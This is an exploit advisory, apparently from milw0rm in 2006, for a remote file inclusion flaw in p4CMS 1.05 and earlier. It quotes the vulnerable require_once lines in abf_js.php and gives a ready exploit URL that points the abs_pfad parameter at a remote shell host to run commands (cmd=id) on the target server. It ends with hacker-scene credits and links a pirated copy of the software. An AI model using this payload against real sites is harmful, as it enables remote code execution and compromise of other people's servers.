p4CMS <= 1.05 (abs_pfad) Remote File Include Vulnerability

#============================================================================================== #p4CMS &#60;= v1.05 (abs_pfad) Remote File Inclusion Exploit #=============================================================================================== # #Critical Level : Dangerous # #Venedor site : http://warez.gtasoft.ru/skripts/p4CMS.v1.05.Nullified-WTN.rar # #Version : v1.05 # #================================================================================================ #Bug in : abf_js.php # #Vlu Code : #-------------------------------- # # @require_once($abs_pfad.&#34;include/config.inc.php&#34;); # @require_once($abs_pfad.&#34;include/mysql-class.inc.php&#34;); # @require_once($abs_pfad.&#34;include/functions.inc.php&#34;); # #================================================================================================ # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/abf_js.php?abs_pfad=http://SHELLURL.COM?&cmd=id # #================================================================================================ #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com # #GreetZ : CCtream - Cyper-worrier team # Special Thx To : Str0ke & simoo ================================================================================================== # milw0rm.com [2006-09-12]